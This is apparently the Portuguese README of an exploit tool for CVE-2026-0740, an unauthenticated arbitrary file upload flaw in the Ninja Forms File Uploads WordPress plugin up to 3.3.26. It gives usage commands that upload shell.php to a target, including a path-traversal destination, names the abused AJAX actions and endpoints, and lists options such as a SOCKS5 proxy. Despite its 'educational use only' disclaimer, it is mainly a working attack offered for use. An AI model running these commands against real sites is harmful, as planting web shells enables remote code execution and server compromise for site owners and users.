
Ninja Forms File Uploads <= 3.3.26 - Upload de Arquivo Arbitrário Não Autenticado
CVE-2026-0740 é uma vulnerabilidade de upload arbitrário de ficheiros não autenticado que afeta:
Ninja Forms File Uploads ≤ 3.3.26 (plugin WordPress)
Esta falha permite que atacantes façam upload de ficheiros arbitrários para o servidor sem autenticação, potencialmente levando à execução remota de código (RCE).
Este projeto é fornecido apenas para fins educativos e de teste de segurança autorizado.
Instalar dependências:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php/wp-admin/admin-ajax.phpnf_fu_get_new_noncenf_fu_upload/wp-content/uploads/Este projeto é licenciado sob a Licença MIT — consulte o ficheiro LICENSE para mais detalhes.
Pull requests são bem-vindos. Para alterações importantes, abra primeiro um issue para discutir o que gostaria de alterar.
| Argumento | Descrição |
|---|
-t, --target | URL alvo |
-f, --file | Ficheiro a enviar |
-d, --dest | Caminho de destino (path traversal) |
-x, --proxy | Proxy SOCKS5 |
-H, --headers | Cabeçalhos personalizados |
--timeout | Timeout do pedido |
--no-color | Desativar saída colorida |
-q, --quiet | Modo silencioso |
--verify-ssl | Ativar verificação SSL |